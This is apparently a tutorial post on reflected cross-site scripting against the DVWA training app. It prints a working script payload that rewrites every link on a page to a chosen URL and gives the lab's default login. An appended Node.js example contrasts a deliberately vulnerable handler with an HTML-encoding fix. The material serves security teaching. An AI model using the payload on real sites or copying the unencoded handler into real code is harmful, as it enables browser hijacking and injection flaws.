XX Attack: Hijacking the User's Browser with a Reflected XSS Attack
2022-07-01 08:06:00 【Cwillchris】
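We first construct a reflected XSS attack that redirects to the vulnerable page. The attack could also be carried out directly in DVWA, but for demonstration purposes we built a relatively complex environment.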
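```html
<script>
// Run once the page has finished loading.
window.onload = function() {
  // Collect every <a> element on the page.
  var link = document.getElementsByTagName("a");
  // Point each link at the attacker-chosen URL.
  for (var j = 0; j < link.length; j++) {
    link[j].href = "http://www.baidu.com";
  }
};
</script>
```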
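JavaScript code analysis: `window.onload` runs the anonymous function once the page has finished loading.

What the function does: `document.getElementsByTagName` fetches all `a` tags in the page and stores them in the `link` array (an array-like collection). A `for` loop then replaces the `href` of every element in `link` with the malicious URL.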
Open the Chrome browser; we test the effect on the reflected XSS page.

Log in at http://192.168.98.66/DVWA-master/login.php with username admin and password password, then change the security level to low.
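The script above only runs if the page reflects the request parameter into its HTML without encoding. The following JavaScript (Node.js) is an added example, not code from the original post or from DVWA: it reflects the post's script through a hypothetical `name` parameter on a constructed URL (`http://app.example/greet`), once unencoded and once HTML-encoded, and all function names are assumptions.

```javascript
// Added example, not from the original post. Handler and URL are hypothetical.
// Sample input: the link-rewriting script from the post, on one line.
const PAYLOAD = '<script>window.onload=function(){' +
  'var link=document.getElementsByTagName("a");' +
  'for(var j=0;j<link.length;j++){link[j].href="http://www.baidu.com";}' +
  '}</script>';

// Constructed request URL: the payload travels in the "name" query parameter.
const requestUrl = 'http://app.example/greet?name=' + encodeURIComponent(PAYLOAD);

// Read the reflected parameter the way a server-side handler would.
function getName(url) {
  return new URL(url).searchParams.get('name') || '';
}

// Vulnerable: the input is concatenated into the HTML response unchanged.
function renderVulnerable(url) {
  return '<pre>Hello ' + getName(url) + '</pre><a href="/home">Home</a>';
}

// HTML-encode the five characters that can change the parsing context.
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, c => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;'
  }[c]));
}

// Hardened: same response, with the input encoded for the HTML body context.
function renderHardened(url) {
  return '<pre>Hello ' + escapeHtml(getName(url)) + '</pre><a href="/home">Home</a>';
}

// Crude check: does the response contain a real <script> element?
function hasScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

console.log('vulnerable has <script>:', hasScriptTag(renderVulnerable(requestUrl)));
console.log('hardened has <script>:  ', hasScriptTag(renderHardened(requestUrl)));
console.log(renderHardened(requestUrl));
```

With encoding in place the browser displays the script as text inside `<pre>`, so the `Home` link keeps its original `href`.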